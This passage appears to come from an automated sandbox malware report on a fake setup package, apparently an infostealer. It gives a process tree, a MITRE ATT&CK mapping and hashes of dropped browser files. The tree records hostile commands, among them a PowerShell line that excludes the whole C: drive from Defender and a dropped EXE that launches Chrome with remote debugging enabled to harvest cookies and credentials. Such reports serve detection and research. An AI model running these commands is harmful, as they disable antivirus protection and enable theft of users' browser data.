      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3476
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4868
    - - C:\Users\Admin\AppData\Roaming\JKTAP89G.exe
        
        "C:\Users\Admin\AppData\Roaming\JKTAP89G.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:2068
      - C:\Users\Admin\AppData\Roaming\JKTAP89G.exe
        
        "C:\Users\Admin\AppData\Roaming\JKTAP89G.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4584
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Drops file in Windows directory
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        
        PID:4240
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffd3634cc40,0x7ffd3634cc4c,0x7ffd3634cc58
        8⤵
        
        PID:5128
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2304,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2300 /prefetch:2
        8⤵
        
        PID:4368
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1880,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2356 /prefetch:3
        8⤵
        
        PID:1140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1980,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2548 /prefetch:8
        8⤵
        
        PID:2316
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3188 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3544
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6112
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4452,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4580 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5184
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4752 /prefetch:8
        8⤵
        
        PID:3172
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4536,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4812 /prefetch:8
        8⤵
        
        PID:976
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4528,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4928 /prefetch:8
        8⤵
        
        PID:4428
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4788,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5080 /prefetch:8
        8⤵
        
        PID:4664
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5136,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4868 /prefetch:8
        8⤵
        
        PID:3556
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4848,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4912 /prefetch:8
        8⤵
        
        PID:3288
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5200,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8
        8⤵
        
        PID:4016
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5180,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5164 /prefetch:8
        8⤵
        
        PID:5828
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4292,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4736 /prefetch:8
        8⤵
        
        PID:1244
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5108,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3632 /prefetch:8
        8⤵
        
        PID:5000
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5296,i,13362861128697325249,3851013467830291956,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4732 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:228
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 808
        6⤵
        Program crash
        
        PID:960
- - C:\Windows\system32\timeout.exe
    timeout /t 2
    3⤵
    - Delays execution with timeout.exe
    PID:5152

C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\7za.exe
"C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\7za.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1760

C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\7za.exe
"C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\7za.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5420

C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\7za.exe
"C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\7za.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1532

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\Setup.txt
1⤵
PID:2028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2068 -ip 2068
1⤵
PID:5556

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\mapistub.txt
1⤵
PID:5124

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:5492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:4884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Modify Authentication Process

T1556

Privilege Escalation

Defense Evasion

Modify Authentication Process

T1556

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
ebeddf1ed8bb8f453f8d1035e384384d

SHA1
62abf8299b2ec924c816322818f1268cadb46f93

SHA256
d4bf16f24048f74037ca4e1e058d91b8395132ce187ef2bc696481fd65f59481

SHA512
3ba4208877233e92be4c79e0c2c777df2aebae0944c77689c40ce3a47af8b7ee334002063eeff6b602172af3e8d6e970d5d38b289c4866189582d75961528193

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
41ad62f33906cc2cf73b316ea48dec80

SHA1
d8160de99eb39064c764da781914add9fbdd26bd

SHA256
f15653ab1df1f84f83c839d278118eafea5265861558edc5af9a2991a2223f4b

SHA512
e87381392079385aaf9eeef2b6866f00f61f8a10f6613683a1ed77929d147a80356173e46f877de2cf79339159b301a401b69eec5f178cddb0f6a1c9d7fcfb87

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
189B

MD5
3eb04a70a27716df0316683b00fadb91

SHA1
04fa1ca29fa6a200f86161ebd48d803f5f9ffe29

SHA256
9809b5b775633aaba9b733375ff65140ae91fb776541cf1082d9e2b5ec2942e5

SHA512
3a08bb75eabf5fcb3e0f4169de52699629e704d49fe704105f232f8600ed916a2958e6d88afb8c2e5201d2dd7710a012318576973b0d37829df797c1efea4d4d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
baa7d66b12ff33c15865062e59123d64

SHA1
f08a7feca8c1d564691d4e9794df9652455ed426

SHA256
49c518bdff0fbb40b9c15ff3f44524169a451a0cb04139b8e7e3ed312d424bd0

SHA512
cf98a157e5665092fad5c541f503c5cb382c00ad36568ad4e9750280ed3451a874574b656062108d204fcf5029e83356c6631bb5c1b01f8c5c6c4b1e19707a0d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
9fa40bb840def790d6a18a6f37e12031

SHA1
a5521bce2162cd525b62c2a020f0ebea08f06060

SHA256
6f02f1812e1d13eac45ecedabb453a78b3822a9f7faf1dd4e844edc7df7926d8

SHA512
5a3faafe7399b3917097de8e318f7defdfff80e79fa34e445b9e3fadf2d0eba3839f585aeffa055660d8c7fbb3678112dd2b06157b98710ce181c98794463557

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
d08f43e3b28e1aef0843964a05818beb

SHA1
5ab8daaa79835ae3449955385a067b07ad1d9967

SHA256
d91a97c9bf78708bc75c50f99c613fdd9e0c0168b3e1c30d2f36dad13c49a62b

SHA512
7a3fc3e2832c5dbf602b6c338cacdf679cfcd2585a766253d9dd9af29aed4c61e5859d48a7373d615e48ce8ad5fffb0a7c41bcc73ca8f9f509d313c2dfda5510

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
4a6ad278e7f56d51292ea066202f6629

SHA1
20e2f56c87a29f6f48627e2a87fcacb62c18592b

SHA256
4c6a49743aadeb560a60544b053c7be21c2115877196f76a62d4966631983677

SHA512
31c681708e29904f6e04971ad514aab07e39127cd9b2c411d0a374f573c6fe494b57b5c13efe0536275b14a5a437080ed1edb541329c1c0bc3e7c93b65095f39

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
818aa58b6e2c2985101f6de64a5fb40f

SHA1
1e671a192e5a14c5531190da31dd4a993f2e1f2d

SHA256
d8c42e9f31e8de0b84e5a5766a21ef7bcf003d98a0fc86c827afd15bb9f2bff1

SHA512
8a36c7a4b51f7fdca0ed662935c277bd03d6807113c842d162f529069bd19d1e9b8615d32a46fd5b13e935900c4e71cecb532370cf917292d89c54274f148251

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
ed7973c283e4282d7d55865460af3767

SHA1
cc6cfb45c3067f5909ca4c9c0e7e2d99f442b084

SHA256
a19ab268389bfddb613770f005ac1ae0edb1769d304433e60fafeb3624213b86

SHA512
f18a48cb2ac514e3d54ff0683930e1b4848cdae5e15ec49bafca16c02a1013110347b587f5d0ccd726371140bbe684544a4af91c262ace630e209284d5a92363

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
e781f5b185b596072d699b59fa939d2d

SHA1
d225eb3c9160df78b1fa43508b45cbabbff75174

SHA256
76e79aee96718882db297068acd41b84ba650fe1dee91f6fffd084241357d60d

SHA512
b6e121f570d1dd671881c219b447f4dc446651123c691b4de0262905772aeb2b75ad4e3d2bc24e8daacc81551e0d6f28016cc332617c0d790c702011bab8b1c3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
e5e111b3594f3955303cba4f2e8b9184

SHA1
760df6f980c93acee6695fc316f3984f06fe1e67

SHA256
030e23228f86f94ca22a071ab1514b0707ce5b07e03ed8a825f90e4b9e5867b0

SHA512
23224cf7c078848e55b53f9aa78cd0b97d8e8ceb016162c82e765a8906511c16ec50870c21d88d25efe9e540de09c433da50b1f65e01253193491b11c25cf5dc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
b7616b02d12d5c382ac99126cb9c96da

SHA1
d9768015cc2f3dfaee39aaa1f15b1e19508d5a8e

SHA256
7955464c45ead246f6c86ee79bd6060cbd93b83b32b0761265fe4f0cdd23b0af

SHA512
e7f0440dfe8453ea0881ad927785f59ec05a98a90c80c531fd1a439cbbe70ce6de8883b37b0bccfcb2cb610b4a31fc5206868b79b0eb4eaca45b33c562bb7530

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
245KB

MD5
9372ae0700b8aefb62eca16f43f31ee0

SHA1
33378052a792eb6f38eb6b6734db39089ea8eb43

SHA256
95e89fe9b8fbfe5eae45710a218ff56734caadf144663d9fc679ea1ad88c3f26

SHA512
b2d118513d0fd2b0ab56cbb85f7e2847add354deb3ed1bbe5911f8798fff5d3d80beb5d3ee01c3a34e04c2a5ff66fcc0582678c0aec82b7f40d56c7eab9686bc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
245KB

MD5
b29cab96655bb0947b89e480ca7a279d

SHA1
bc4b96a4c9acb9d5927dfd2ed2975baeb500adb5

SHA256
e9d454c886a56045c50a4cd3a6ab181cecc67eb4a802c038d63ab541c6902f25

SHA512
7111da902a31247fd1770c598679265e9fbee680b04007a195782ed89b555f5595dcf08152980c70d59805202aebe4e7a5cb9b56e906566c0efef5a021427482

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b0dfbdad47d1a5d0e150f7ce1c87a2c8

SHA1
7163d90657a956bec90a73af78c3393168a2c114

SHA256
d29eb9e2fceb8cf4bb4ed7b032efaf38d893586e0bc2cb672d7d5550603328f8

SHA512
aa60297fa8652377bf3e36f6caf10cef8e8be1986565e99c369fe92625059d36d1f4b23b8ec8cd4b9fc4133702d9b7fda189b21821d2019d4eb7fed4f997010d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000029

Filesize
214KB

MD5
d20fef07db1e8a9290802e00d1d65064

SHA1
71befda9256ed5b8cd8889f0eeab41c50d66e64e

SHA256
f9cb4624d03224bfce50c4c0e484418acd462c249f38b4684e72b27a1f30144d

SHA512
ad5b2c8df60027c6dd5104bb8c2357b04eb24d69245c607ff99a6f2a887f929428252ad793d9aaa8c903c7b1e1bf9653cd35f79747d5281e7e3d2c21fa828537

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

Filesize
2KB

MD5
e7518bbf1af82f63d7ff4d1aba0ec4d3

SHA1
2d5e8dc050901e17dbeb333f8379f3a519f46184

SHA256
2295bdb2efab55f5d9879df0f53f4aae24910a270a6bf59997dec05b8c229f33

SHA512
534f70ebecaebf124a3f9f6676ec41ce6c3f9cf8410634d628a0bb939b838459f454b8bab341deff36c4a4efb2c0885549a6dd42eb13f67d956161a715387aa8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
fde8b4e372dc3379e974abc712bde9e5

SHA1
c6aabdddbfde09ea72f0cd05380d332e2c2b139f

SHA256
241649720f83cad776c442d8bc664d6684836cfca27c791664ff72aecf72b53d

SHA512
13fd531537f045fa1931397602732bfad20974df02e2217e48b20141e410461449b30ba87a793a5844572462e2d845d2d40a2e3ad027529a0dae4879d7e4e512

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
4452ac1cd75068134528154c03791112

SHA1
9bfe453172de68d26b647ade7d8675b0b118131a

SHA256
540ad8e73985bb78a43bfcee9c0be9c2925162f6b10a81c23f48067fe02f40c6

SHA512
8c8f79450b72bf2da3ca5316818dce5285e0de0853e15d3147ba7025ba5a9f8287b7f4acd14fd9d7c92a1d0d6ddaf373f79ba4b3ce251ca4005acaec428565e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
32fb496d9a00c403caa5dba4d32daefc

SHA1
d56c117ca9d0dd1a005b871cc095d70609f852d6

SHA256
b7d5a74879713586368acf68fdb3aef65dffd6a474b1bb88b7dcefe66b0a32cb

SHA512
8f45583b848e3a01b3b77100a8c42c1efa2403afff6bf881f3b5a85ad126a9c96c0514d466ad5bc228b2020ecf3ea4bce05e5f02ed9dc74bdf454cd0011cc37c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
a21c7a5f913e2d783c694732713671cd

SHA1
2310718240b064f298420bcd6fefbae203e6c55a

SHA256
797c5b0ea4937900078086656ca3e037fe9b08030faa15bbc12e51c8cc69d397

SHA512
6342a63ce04b14c7c3ed20ccc25e2038a021e5c49c7e7791049ee0cc3e5b929784478c059c9c8000b69addfcd3b5ae810c0b91c55e96f7ba33ed555c794a2eea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
6KB

MD5
eb99997d81176b9d0b841246defe48a7

SHA1
795bff499e9b2d5071ee7c954e761718531c16c7

SHA256
04c266efc10f1bd12a71e7a02ba374bf7db028b3ee06618fed17db1838c97eb7

SHA512
7dbe42a3829aef07cbf5a40ca3d6b762f9cf074bebb6d3d85d50b7f7cd31902b47e5394383de5370232f4b155dc0f3815034629539f0fa7318772779ee889452

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
6KB

MD5
2c06bb122b21304f31fc9897d96d0bc1

SHA1
967a03ded5f0c6d53cef7653d61c1e917eb468ce

SHA256
7f8a21119318e1a67343602b578a41bab0f08dfa0efb534a18f2164b50225a79

SHA512
f68179145032724c0cda935f7b91250f578e7a899002b52cf360227487ed7fd12e34abd91df83a427a0ef45d3cc7e61e90944578b96eee6c548214312c75ea92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
6KB

MD5
0b2099e999303495376b38b81688eaee

SHA1
dd3a25de6ea415c895914c08701387af551d0ed0

SHA256
d49a030c137c4bb04943b5e38a17f6fc1fd22fb4749335e4897170108425bdad

SHA512
0a7b394d7f34599fc5b886cf1fea6ad5519b7c32e7b9f4ba6e3af33161650a2838273a85fbf73e259fd41c6b680c5dcd0e4adc4ba55e210a754915dd890374cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
50483c797f2bc2a3c572c56d12984ebd

SHA1
440b0531d5cae9a2287d88a16f002d70ffcd8d40

SHA256
3201cc15644727c57c0df4f16b6164d22b69a3c5d963f94aefeb33db376094cc

SHA512
17c25cb1d7fa56eb431219f7c9214e347676352d893a44a353a7c69910665cd72cb6eae5a2096573be1f5fa8a827d3f3adbfac00c138a7d271a6e1d01f5dfe01

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
6404e2e2201fade8f799f967ab3c79d4

SHA1
b2e6601d712b7cfbbb6125073f80a2be8af207c9

SHA256
fa0036c7ce286c6b26e7efd98cd3242ac77057864c34bd9b7e7c0e6264d37a49

SHA512
f733a3b806af1a9e12e896a0c2294c573f8207ac724bd0a7a476c5e6fc570c20cc9494ff5ed518629e5c52a9d1b88345e369a6bea92cc6118de280da91aa39e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
032c9bb53aee370e3d9d94aa42b46900

SHA1
7c06c271da361c26b2c616331a3243eaaa6ab6fa

SHA256
e02f46a8e67d1b50a40c0b4805cd888f3b26a320352c698c732d1f7f4490578b

SHA512
2b15679a97967a39f7dda9643063775f801b17cb462cf7d7fbbc545d00cfa3421856d07e33e3a072a6a876d66153bc77310ada868457be51781ad900bbc332b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
66588f4aff65a9970d3f41c3ef3ca70a

SHA1
6bf97c607821359e0c2d6935ebfa01f752840e1d

SHA256
b18aa0b84254b15c7189055ea38b4187fbe5544b1a34874d2d1b078b266e376c

SHA512
d18387d09b6da0db5840123c85a38bcd1d2a8239018b31e37667a1f890185a71b78c75caba64cfb3cca93fcd5d837fd4c12f0b4f01e064f1971b1944e64f7329

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
3b30cd6b6e24eef933a6a0503d780685

SHA1
6ad1ee6cd915c83210bb4f834c2dc56c07b39cbd

SHA256
f2a972332b2fdc31b8f0863d9afa817c4de803e824f0e7d66860a3bb5eb0e6a8

SHA512
061996c4fae325a6626fd00026b36b59e9c35e4f627bf21104c1b7d43e3dc3fc912c7c188d9feb447ee479ef1f33b4e19a62c1dfb072ebef3f911fb5f16ddd0d

Download Submit
